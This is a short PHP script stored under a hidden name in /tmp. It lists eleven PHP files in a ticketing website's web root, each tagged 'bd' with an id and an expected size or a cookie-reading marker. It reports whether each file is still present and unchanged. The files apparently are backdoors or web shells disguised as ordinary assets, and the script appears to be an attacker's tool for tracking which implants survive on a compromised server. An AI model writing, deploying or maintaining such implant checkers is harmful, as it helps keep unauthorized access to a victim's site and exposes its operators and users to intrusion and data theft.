File: //tmp/.key
<?php $r = '/var/www/vhost/disk-apps/teamdemo.sports-crowd.com/public'; $x = ["/flash_ticket_builder/changeProject.php"=>"bd@@178198@@2188",
"/flash_ticket_builder/assets/css/modules/lib_options_del.php"=>"bd@@178199@@427",
"/flash_ticket_builder/assets/js/MimeList.php"=>"bd@@178200@@600",
"/flash_ticket_builder/assets/css/solucio.php"=>"bd@@178201@@1029",
"/img/carnet/links.php"=>"bd@@178202@@1631",
"/flash_ticket_builder/flash.ticket.builder.php"=>"bd@@178808@@_COOKIE[3]",
"/flash_ticket_builder/assets/TextField.class.php"=>"bd@@178810@@387",
"/datatables/i18n/danish.php"=>"bd@@178811@@729",
"/css/carnet/titulosp.php"=>"bd@@178812@@575",
"/css/ticket/Range.php"=>"bd@@178814@@579",
"/instagram/opensearch_desc.php"=>"bd@@178815@@534"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');